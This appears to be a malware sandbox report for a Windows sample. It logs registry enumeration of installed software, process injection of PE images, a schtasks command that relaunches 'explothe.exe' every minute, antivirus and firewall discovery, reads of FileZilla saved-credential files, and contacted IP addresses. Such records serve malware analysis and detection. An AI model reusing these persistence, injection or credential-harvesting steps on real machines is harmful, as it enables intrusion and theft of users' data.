base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000464
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0
cmdline "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe"
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1356 CREDAT:145409
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1356 CREDAT:79875
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
wmi SELECT * FROM Win32_Processor
host 109.107.182.133
host 117.18.232.200
host 193.233.255.73
host 77.91.124.1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2908
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 253952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $àž ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhX‚ÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°€dX´ÿmY°€’Y¥ÿmY°€oX¥ÿmYRich¤ÿmYPELÖT5eà $*¸A@@ @L›(ààðÐ/à @@.text)* `.rdataxa@b.@@.datah#°@À.rsrcààž@@.relocÐ/ð0 @B
base_address: 0x00400000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0042b000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: €0€ H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0042e000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELïd‚Æà 0ʬè @ à@…ÈçSV©À  H.text$È Ê `.rsrcV©ªÌ@@.reloc Àv@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: à 8
base_address: 0x0043c000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2680
process_handle: 0x00000118
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $àž ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhX‚ÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°€dX´ÿmY°€’Y¥ÿmY°€oX¥ÿmYRich¤ÿmYPELÖT5eà $*¸A@@ @L›(ààðÐ/à @@.text)* `.rdataxa@b.@@.datah#°@À.rsrcààž@@.relocÐ/ð0 @B
base_address: 0x00400000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELïd‚Æà 0ʬè @ à@…ÈçSV©À  H.text$È Ê `.rsrcV©ªÌ@@.reloc Àv@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000118
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
